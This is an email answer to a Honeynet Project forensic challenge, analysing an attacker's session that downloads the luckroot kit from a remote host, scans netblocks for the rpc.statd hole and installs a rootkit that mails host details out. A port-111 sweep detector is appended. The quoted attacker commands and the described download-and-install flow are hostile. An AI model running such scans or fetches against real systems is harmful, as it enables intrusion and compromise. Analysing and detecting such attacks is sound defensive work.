From steve@shockley.net Sat Mar 17 19:44:08 2001
Date: Thu, 1 Mar 2001 00:08:41 -0500
From: Steve Shockley
To: project@honeynet.org
Subject: Scan of the month - 13

Thanks for the interesting challenge! It was fun getting to dust off those old neurons that knew some C code.

Finally, someone found the tool that was scanning me forever on port 111! I've been seeing these for over a year now. Fortunately, the network I had that was getting scanned didn't have any RPC machines visible!

********
1. What is the blackhat attempting to do with his command line syntax?
********

Blackhat entries marked with |

|cd .mail
|cd /usr/sbin/.mail

Find a folder that has frequently-changing data and is infrequently browsed.

|lynx www.becys.org/LUCKROOT.TAR
|y

Download the rootkit and save.

|tar -xvfz LUCKROOT.TAR
|tar -xzvf Lu
|tar -xzvf L
|tar -xzvf LUCKROOT.TAR

Unpack the rootkit. A little keyboard trouble here. Assuming the compromised host was in the US, it was probably between 12-3am in Romania, and I hear they don't have Jolt there.

|cd luckroot

Change to the new folder.

|./luckgo 216 210

Starts the script to scan for vulnerable hosts. In this case 216.210.x.x is being scanned. It appears the tool is versatile enough to scan a class A, B, or C address space. Most of these appear to be Class B sized subnets that are likely to be small businesses.

|./luckgo 200 120

This one baffles me. ARIN has no record of a 200.120.x.x subnet, yet it was scanned twice. Maybe the victim's subnet?

|./luckgo 64 120
|.luckgo 216 200
|./luckgo 216 200

Typo, again.

|./luckgo 200 120
|./luckgo 63 1
|./luckgo 216 10
|./luckgo 210 120

Korean block; I understand they're notorious for unsecured mail hosts, probably unsecured servers as well. The language barrier doesn't help when trying to warn them of problems, either.

|./luckgo 64 1
|./luckgo 216 1
|./luckgo 194 1

"Network of the Slovak Tax Offices." My my, shooting for the stars.

|./luckgo 216 1
|./luckgo 210 128
|./luckgo 24 1

And of course, who could be a hacker without scanning @home. Without performing scans, it appears that 24.1.x.x may be cable modems in Southern California, for the most part.

NET : 24.1.16.0  : SFBA-TCI-SNVL-1 : (San Francisco Bay Area?)
NET : 24.1.128.0 : OCCA-COX-MSNV-1 : (Orange County CA?)
NET : 24.1.144.0 : OCCA-COX-DNPT-1 :
NET : 24.1.160.0 : OCCA-COX-ALSV-1 :
NET : 24.1.176.0 : OCCA-COX-ORNG-1 :
NET : 24.1.192.0 : AZ-COX-PHNX3-1  : (Phoenix, AZ?)

|./luckgo 12 20

Small businesses connected through AT&T who figure "Who would want to hack me? I have nothing they'd want."

********
2. What does the tool accomplish?
********

It appears to scan the selected netblocks for an RPC vulnerability on Redhat 6.2 machines with the rpc.statd vulnerability. It then

********
3. How does the tool work?
********

The program luckgo is a script front end that boosts some egos, prints some instructions, does some basic validation on input, compiles luckscan-a and luckstatdx, then executes luckscan-a, passing the target IP block and the port (hardcoded to 111/RPC).

The luckscan-a program actually performs a scan for open 111/RPC using a connect() scan. When it finds an open port, it launches ./luckstatdx to attempt the exploit. When luckstatdx returns, it continues.

The luckstatdx.c has been hacked to connect to the target machine. The connection() routine tries the rpc.rstatd vulnerability, and uses the shell to download a rootkit from http://www.becys.org/xzibit.tar.gz, unpack it, install it, and remove the archive.

The xzibit rootkit turns off history logging and replaces netstat, ps, ifconfig and top, opens up some ports for its daemons, copies its own version of sshd, installs a CGI program if apache is installed, grabs some machine info and emails it to becys@becys.org, and finally deletes the rootkit install files.

********
4. Is this tool a worm, or would you classify it as something else?
********

This doesn't seem to be a worm, since once the rootkit is installed it doesn't seem to go on to try to compromise additional hosts; however, I'm not able to verify this since I don't currently have a Red Hat machine at my disposal.

********
5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?
********

I haven't seen these tools before, but it's obvious that it's a hacked version of someone else's tool. The author of the luckgo script obviously likes to talk in h4x0r talk, and went to a lot of trouble to put blinks and colors using ANSI escape sequences. The usage instructions also don't cover all the possible arguments.

The person who hacked luckstatdx.c seems to have a limited understanding of English syntax:

// Becys was modify herre some cmd.
// Aici cred ca trebuie un exit.
   (Romanian: "Here I think an exit is needed.")

whereas the person who wrote the original code has a good command of English and uses C-style comments ( /* */ ) instead of C++ style ( // ).

I'm also guessing that luckscan-a.c and luckstatdx.c were written by different programmers because of subtle formatting variations, such as 2 char vs. 4 char indents, and:

void fatal(char *err)  vs.  void usage(char *app)

and the usage of printf() (luckscan-a) vs. fprintf(stderr,"...") (luckstatdx.c). The author of luckscan-a doesn't comment his code; I'm guessing the author of luckstatdx.c programs professionally, or at least has his code frequently looked at by people who will yell at him if there aren't any comments.

********
Bonus: What information can you obtain about who is using or created the tool?
********

Aside from what I've covered already, it's obvious that the tool was being run by someone who can read email at becys@becys.com. If it's the actual owner of the domain (and the info in whois is correct) there seems to be an easy trail back to him, since the address and phone number are listed there.
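As an added defender-side example (not part of this submission or of the luckroot tools), the Python below flags the sweep pattern described under question 3: one source making connect() attempts to port 111 on many distinct hosts inside a single /16, which is the block size a two-octet luckgo argument selects. The iptables-style log lines, the source addresses and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log lines (syslog/iptables style, not from the challenge data):
# one source sweeping the 216.210.0.0/16 block on port 111 plus unrelated noise.
SAMPLE_LOG = """\
Mar  1 00:08:41 gw kernel: IN=eth0 SRC=10.9.8.7 DST=216.210.1.1 PROTO=TCP DPT=111 SYN
Mar  1 00:08:41 gw kernel: IN=eth0 SRC=10.9.8.7 DST=216.210.1.2 PROTO=TCP DPT=111 SYN
Mar  1 00:08:42 gw kernel: IN=eth0 SRC=10.9.8.7 DST=216.210.1.3 PROTO=TCP DPT=111 SYN
Mar  1 00:08:42 gw kernel: IN=eth0 SRC=10.9.8.7 DST=216.210.1.4 PROTO=TCP DPT=111 SYN
Mar  1 00:08:43 gw kernel: IN=eth0 SRC=10.9.8.7 DST=216.210.2.1 PROTO=TCP DPT=111 SYN
Mar  1 00:08:43 gw kernel: IN=eth0 SRC=192.0.2.5 DST=216.210.1.1 PROTO=TCP DPT=80 SYN
Mar  1 00:08:44 gw kernel: IN=eth0 SRC=192.0.2.5 DST=216.210.1.1 PROTO=TCP DPT=111 SYN
"""

# Only the fields the detection needs; assumes the iptables LOG target field names.
LINE_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+)")


def parse(log):
    """Yield (src, dst, dport) for every TCP line that matches the pattern."""
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group(1), m.group(2), int(m.group(3))


def sweep_sources(log, port=111, threshold=4):
    """Return {src: (block, sorted distinct dsts)} for every source that touched
    `port` on at least `threshold` distinct hosts of one /16 (two leading octets,
    the granularity of a two-argument luckgo run). Threshold is a constructed value."""
    seen = defaultdict(lambda: defaultdict(set))   # src -> /16 -> {dst}
    for src, dst, dport in parse(log):
        if dport != port:
            continue
        block = ".".join(dst.split(".")[:2]) + ".0.0/16"
        seen[src][block].add(dst)
    hits = {}
    for src, blocks in seen.items():
        for block, dsts in blocks.items():
            if len(dsts) >= threshold:
                hits[src] = (block, sorted(dsts))
    return hits


if __name__ == "__main__":
    for src, (block, dsts) in sweep_sources(SAMPLE_LOG).items():
        print(f"{src} swept {block} on port 111: {len(dsts)} hosts")
```

A single connection to port 111 (192.0.2.5 above) is not reported; only the breadth across a block is, which is what separates a luckscan-a sweep from ordinary portmapper traffic.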